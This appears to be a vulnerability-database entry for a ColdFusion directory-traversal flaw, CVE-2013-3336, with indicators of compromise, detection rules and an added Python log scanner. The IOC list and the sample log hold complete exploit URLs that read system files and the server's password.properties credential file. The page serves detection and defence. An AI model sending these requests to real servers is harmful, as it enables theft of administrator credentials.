CVE-2013-3336
published 2013-05-09

CVE-2013-3336: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.

Priority: P2 (73) · Severity: medium · CVSS 2.0 base score: 5.0
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploited in the wild (ITW exploit); listed in VulnCheck KEV
EPSS: 74.27% (99.4th percentile)

Affected (4 ranges)

Vendor   Product      Version range   Fixed in
adobe    coldfusion
adobe    coldfusion
adobe    coldfusion
adobe    coldfusion

Detection & IOCs (extracted from sources)

url: /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
url: /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
url: /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
path: /CFIDE/adminapi/customtags/l10n.cfm
path: /CFIDE/administrator/images/loginbackground.jpg
filename: password.properties
path: ../../lib/password.properties
path: ../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties
path: ../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties
hash: a4c81b7a6289b2fc9b36848fa0cae83c
hash: 596b3fc4f1a0b818979db1cf94a82220
hash: 779efc149954677095446c167344dbfc
cookie: ANALYZER_DIRECTORY
  • Detect directory traversal exploitation attempts targeting l10n.cfm via the 'attributes.file' and 'filename' parameters containing path traversal sequences (../../), combined with 'download.cfm' as the 'attributes.file' value and 'thisTag.executionmode=end' in the query string.
  • Alert on HTTP responses setting the 'ANALYZER_DIRECTORY' cookie, which indicates successful path disclosure through the l10n.cfm endpoint (the analyzer/index.cfm include above); the disclosed install path is what determines the traversal depth needed to reach password.properties (compare the coldfusion9 and coldfusion10 paths listed above).
  • Flag HTTP requests to /CFIDE/adminapi/customtags/l10n.cfm containing 'thisTag.executionmode=end' and 'thisTag.generatedContent=htp' as indicators of active exploitation.
  • Detect successful credential file exfiltration by monitoring HTTP responses containing the string 'encrypted=true', which indicates password.properties content was returned.
  • Monitor GET requests to /CFIDE/administrator/images/loginbackground.jpg as a fingerprinting step preceding exploitation; MD5 hashes of the response body (listed above) are used to identify the ColdFusion version.
  • The Metasploit module targets the same directory traversal to extract the password, rdspassword, and encrypted properties from password.properties on ColdFusion 9 and 10.
  • The exploit is described as a Local File Inclusion (LFI), not a Local File Download: it can include and execute pre-existing .cfm files on the server, not just read arbitrary files, which is why the analyzer and mail download.cfm pages are usable as stepping stones.
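The detection bullets above, implemented as runnable rules over a constructed access log. This is an added example, not code from the page, from Adobe, or from any detection product; it assumes a simplified log format of "client method url status" per line (real web-server logs need a proper parser), and the three MD5 values are the hashes listed in the IOC section, used only as a membership check because the page gives no hash-to-version mapping.

```python
import hashlib
import re
from urllib.parse import parse_qs, unquote, urlparse

L10N_PATH = "/cfide/adminapi/customtags/l10n.cfm"
FINGERPRINT_PATH = "/cfide/administrator/images/loginbackground.jpg"
# MD5 hashes from the IOC list above; no version mapping is given on the page,
# so a match only says "this is one of the known loginbackground.jpg bodies".
KNOWN_LOGINBACKGROUND_MD5 = {
    "a4c81b7a6289b2fc9b36848fa0cae83c",
    "596b3fc4f1a0b818979db1cf94a82220",
    "779efc149954677095446c167344dbfc",
}
# Dot-dot-slash or dot-dot-backslash, checked after a second URL decode so
# double-encoded %252e%252e%252f is caught as well.
TRAVERSAL = re.compile(r"\.\.[/\\]")


def _param(qs, name):
    """First value of a query parameter, URL-decoded once more; '' if absent."""
    return unquote(qs.get(name, [""])[0])


def classify_request(method, url):
    """Return detection labels for one request (empty list = nothing suspicious)."""
    parsed = urlparse(url)
    path = unquote(parsed.path).lower()
    qs = parse_qs(parsed.query, keep_blank_values=True)
    labels = []
    if path == L10N_PATH:
        file_val = _param(qs, "attributes.file")
        filename = _param(qs, "filename")
        mode_end = _param(qs, "thisTag.executionmode").lower() == "end"
        generated = _param(qs, "thisTag.generatedContent")
        if mode_end and generated == "htp":
            labels.append("l10n_exploit_markers")            # executionmode=end + generatedContent=htp
        if TRAVERSAL.search(file_val) or TRAVERSAL.search(filename):
            labels.append("l10n_traversal")                  # ../ in attributes.file or filename
        if mode_end and "download.cfm" in file_val.lower() and TRAVERSAL.search(filename):
            labels.append("l10n_file_download")              # download.cfm used to read an arbitrary file
        if "analyzer/index.cfm" in file_val.lower():
            labels.append("l10n_analyzer_path_disclosure")   # include that yields the ANALYZER_DIRECTORY cookie
    elif path == FINGERPRINT_PATH and method.upper() == "GET":
        labels.append("cf_version_fingerprint")              # loginbackground.jpg version probe
    return labels


def classify_response(headers, body):
    """Labels for one response; headers is a list of (name, value) pairs, body is text."""
    labels = []
    for name, value in headers:
        if name.lower() == "set-cookie" and value.split("=", 1)[0].strip() == "ANALYZER_DIRECTORY":
            labels.append("analyzer_directory_cookie")       # path disclosure succeeded
    if "encrypted=true" in body:
        labels.append("password_properties_leak")            # password.properties content returned
    return labels


def fingerprint_body(body_bytes):
    """MD5 of a loginbackground.jpg body and whether it is one of the listed hashes."""
    digest = hashlib.md5(body_bytes).hexdigest()
    return digest, digest in KNOWN_LOGINBACKGROUND_MD5


# Constructed sample log (not real traffic): a fingerprint probe, the analyzer
# path-disclosure include, a password.properties download, two benign requests.
SAMPLE_ACCESS_LOG = [
    "203.0.113.5 GET /CFIDE/administrator/images/loginbackground.jpg 200",
    "203.0.113.5 GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp 200",
    "203.0.113.5 GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp 200",
    "198.51.100.7 GET /CFIDE/administrator/index.cfm 200",
    "198.51.100.7 POST /CFIDE/administrator/enter.cfm 302",
]


def scan_access_log(lines):
    """Return [(1-based line number, labels)] for every line that triggers a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        _client, method, url, _status = line.split()
        labels = classify_request(method, url)
        if labels:
            hits.append((number, labels))
    return hits


if __name__ == "__main__":
    for number, labels in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {', '.join(labels)}")
    # Constructed response pair: cookie value is a placeholder, not a real install path.
    hdrs = [("Set-Cookie", "ANALYZER_DIRECTORY=/opt/coldfusion10/cfusion/; Path=/")]
    print(classify_response(hdrs, "password=...\nrdspassword=...\nencrypted=true\n"))
```

The request rules deliberately decode twice and compare the path case-insensitively, since ColdFusion on Windows serves /cfide and /CFIDE alike; tune the traversal pattern to your own server's decoding behaviour before deploying it as an alert.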

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v2.0      5.0     MEDIUM     AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck             5.0     MEDIUM